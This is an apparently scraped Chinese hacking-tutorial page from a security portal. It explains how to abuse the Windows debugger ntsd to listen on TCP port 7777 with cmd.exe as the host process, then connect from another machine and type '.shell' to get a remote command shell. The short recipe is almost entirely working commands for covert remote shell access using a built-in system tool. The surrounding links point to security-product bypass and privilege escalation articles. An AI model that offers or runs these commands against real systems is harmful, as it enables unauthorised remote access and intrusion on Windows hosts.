热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

利用系统自带的ntsd实现端口转发,本地获取shell

发布时间:2013-12-29 21:44文章来源:网络文章作者:秩名 点击次数:
摘要:我们这次利用ntsd来实现利用系统自带的ntsd实现端口转发,本地获取shell。...

Ntsd简介

ntsd从Windows 2000开始就是系统自带的进程调试工具,在system32目录下。NTSD的功能非常的强大,用法也比较复杂,但如果只用来结束一些进程,那就比较简单了。

微观:http://baike.baidu.com/link?url=DlE_yIzoYeBtDEy8CaXrVvNzLPPOtmS2iZfhkYpPA1aOjzF6DtHwC_-SSsA_UZe65hHc8O4hFS_GpOeB85Mitq
====================================================================

我们这次利用ntsd来实现利用系统自带的ntsd实现端口转发,本地获取shell

我们的服务器端执行

  1. ntsd   -server   tcp:port=7777   cmd.exe 

这里的cmd.exe只是获得一个宿主进程,当然mstsc.exe 、 calc.exe等等都是可以的

然后我们的电脑,也就是客户机运行

  1. ntsd   -remote   tcp:server=服务器ip,port=7777 

运行后会弹出一个窗口,我们输入.shell即可成功获得cmdshell

The End

标签分类:

上一篇:再次绕过安全狗sethc.exe阻止 实现突破提权
下一篇:域渗透的金之钥匙